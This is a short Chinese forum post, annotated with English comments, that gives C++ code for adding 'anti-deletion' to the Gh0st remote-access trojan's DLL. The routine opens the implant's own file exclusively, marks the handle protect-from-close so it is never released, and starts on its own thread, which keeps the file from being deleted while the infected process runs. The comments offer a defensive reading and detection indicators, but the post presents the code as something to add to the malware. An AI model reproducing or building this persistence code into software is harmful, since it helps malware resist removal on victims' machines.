最近很多人问我关于Gh0st占坑的问题。其实很简单的，只要把下面的代码添加到dll的源码里就可以了。
/*
 * FilePro - thread routine that pins the module's own file on disk.
 *
 * Reviewer's summary (defensive analysis of what the visible code does):
 * the routine opens the DLL's own image with CreateFileA using a share
 * mode of 0 (no sharing) and then marks that handle with
 * HANDLE_FLAG_PROTECT_FROM_CLOSE. The handle is never closed, so the
 * exclusive open lives as long as the host process does; this is the
 * "anti-deletion" behaviour the page describes. From an incident-response
 * standpoint the file only becomes removable once the owning process is
 * terminated (or the disk is handled offline), and an on-disk module held
 * open exclusively by its own process, plus a SetHandleInformation call
 * with HANDLE_FLAG_PROTECT_FROM_CLOSE, are both useful behavioural
 * indicators for detection.
 *
 * Parameter: the LPVOID thread argument is ignored.
 * Returns: always 1.
 *
 * Defects visible in this block (left unchanged here):
 *  - neither GetProcAddress result is checked for NULL before it is called;
 *  - hfile is never compared against INVALID_HANDLE_VALUE before
 *    SetHandleInformation;
 *  - GetVersionEx is deprecated on newer Windows and may report a
 *    compatibility-shimmed version (assumption about platform behaviour,
 *    not something this page shows);
 *  - CKernelManager::g_hInstance and the *AT function-pointer typedefs come
 *    from elsewhere in the project and are not visible here.
 */
DWORD WINAPI FilePro(LPVOID)
{
/* Resolve the two imports at run time instead of linking them statically. */
GetModuleFileNameAT pGetModuleFileNameA = (GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetModuleFileNameA");
CreateFileAT pCreateFileA = (CreateFileAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateFileA");
OSVERSIONINFOEX osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &osvi);
/* The exclusive open is skipped on NT 6.x (Vista / 7 / 8.x); the page does not say why. */
if(osvi.dwMajorVersion != 6 )
{
char szFileName[MAX_PATH];
/* Path of this DLL, taken from the project's stored module handle. */
pGetModuleFileNameA(CKernelManager::g_hInstance, szFileName, MAX_PATH);
/* dwShareMode == 0: no other open of the file is permitted while this handle exists. */
HANDLE hfile= pCreateFileA(szFileName,GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
/* Marks the handle so CloseHandle on it fails; the handle is intentionally never released. */
SetHandleInformation(hfile, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE);
}
return 1;
}
调用
/* Starts FilePro on its own thread via the project's MyCreateThread wrapper (defined elsewhere); the returned thread handle is not checked or closed here. */
HANDLE hThreadu = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FilePro, NULL, 0, NULL);